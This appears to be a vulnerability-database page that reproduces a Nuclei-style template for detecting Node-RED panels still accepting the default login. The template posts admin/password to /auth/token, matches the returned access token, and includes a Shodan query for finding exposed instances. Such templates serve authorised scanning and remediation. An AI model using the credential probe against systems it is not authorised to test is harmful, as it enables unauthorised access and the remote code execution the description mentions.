漏洞描述
Allows attacker to log in and execute RCE on the Node-Red panel using the default credentials.
nodered-default-login: Node-Red - Default Login
PoC代码[已公开]
id: nodered-default-login
info:
name: Node-Red - Default Login
author: savik
severity: critical
description: |
Allows attacker to log in and execute RCE on the Node-Red panel using the default credentials.
reference:
- https://quentinkaiser.be/pentesting/2018/09/07/node-red-rce/
classification:
cpe: cpe:2.3:a:nodered:node-red:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: nodered
product: node-red
shodan-query: http.favicon.hash:321591353
tags: default-login,node-red,dashboard,vuln
http:
- raw:
- |
POST /auth/token HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
client_id=node-red-editor&grant_type=password&scope=&username={{username}}&password={{password}}
attack: pitchfork
payloads:
username:
- admin
password:
- password
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'access_token":'
- 'expires_in":'
- 'token_type":'
condition: and
- type: word
part: header
words:
- 'application/json'
- type: status
status:
- 200
# digest: 490a0046304402206db19d2d6fff4667787260b4c71eaf7fa2a0d34bb5931dc644750b7f2b8af9000220371554b4ae826c69fe41f47b232d8631910f7c746a66ab6ea7a46e5119c0e4f9:922c64590222798bb761d5b6d8e72950